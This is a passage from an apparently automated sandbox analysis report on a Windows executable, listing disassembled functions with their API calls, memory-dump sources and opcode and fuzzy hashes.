                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2880819207-0
                                                                                                                                                                                                                • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                                                                                • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                                                                                                                Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                                                                                                                • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 357397906-0
                                                                                                                                                                                                                • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                                                                                • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                                                                                                                Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00433950
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433974
                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1187119602-0
                                                                                                                                                                                                                • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                                                                                                • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                                                                                                                                Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1597257046-0
                                                                                                                                                                                                                • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                                                                                                                                • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                                                                                                                                Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                                                                                                                                • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 237123855-0
                                                                                                                                                                                                                • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                                                                                                • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                                                                                                                                Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeleteDestroyObject$IconWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3349847261-0
                                                                                                                                                                                                                • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                                                                                                                • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                                                                                                                                Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2223660684-0
                                                                                                                                                                                                                • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                                                                                • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                                                                                                                Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 00447336
                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 00447344
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2783949968-0
                                                                                                                                                                                                                • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                                                                                • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                                                                                                                Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2710830443-0
                                                                                                                                                                                                                • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                                                                                • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                                                                                                                Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                                                                                                  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                                                                                                  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 146765662-0
                                                                                                                                                                                                                • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                                                                • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                                                                                                                Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                                                                                • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                                                                                                • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                                                                                                                                Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                                                                                                • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                                                                                • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                                                                                                                                Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                                                                                                                                  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                                                                                                                                  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                                                                                                                                  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
